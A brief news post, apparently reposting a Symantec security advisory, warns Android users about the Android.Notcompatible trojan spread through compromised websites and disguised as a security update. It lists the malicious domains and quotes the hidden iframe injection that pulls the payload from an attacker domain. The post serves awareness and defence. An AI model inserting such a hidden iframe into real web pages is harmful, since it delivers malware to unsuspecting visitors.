Android users beware! Symantec Security Response has detected a new Android malware spreading via infected websites. Symantec urges Android users to be aware of the threat and be careful when visiting unknown sites.
[ad#Google Adsense 336×280]
Symantec has observed a new Android malware threat being distributed by a handful of infected websites. Full details on this threat, detected by Symantec as Android.Notcompatible, can be found here: http://www.symantec.com/connect/blogs/website-injection-campaign-used-conjunction-android-trojan.
When a user visits an infected site, this Trojan is automatically downloaded to their device. Unlike a traditional drive-by download, however, the user must still manually agree to install this threat. Therefore, it has been disguised as a device security update. The threat then allows its creator to reroute data traffic from an infected device to a third-party destination.
Devices that allow installation from ’Unknown Sources’ are most susceptible to this type of attack as the user has to manually accept the permissions and prompts that are requested prior to an installation.
Extract from Symantec blog:
[quote] The following domains have been identified so far based on our investigation:
- [http://]androidbia.info
- [http://]androidjea.info
- [http://]gaoanalitics.info
- [http://]androidonlinefix.info
The website injection is of the form:
<iframe style=”visibility: hidden; display: none; display: none;”
src=”[http://]gaoanalitics.info/?id=[CLSID]”>;
</iframe>
This injection has been identified not only on HTML sites, but also in robots.txt files. Therefore, it could well be the case that all files on the compromised Web server will have this iframe appended to it.[/quote]
This threat highlights how mobile malware authors are moving beyond traditional “smash-and-grab” activities, such as premium SMS scams, and towards more sophisticated assaults, such as theft of sensitive information.
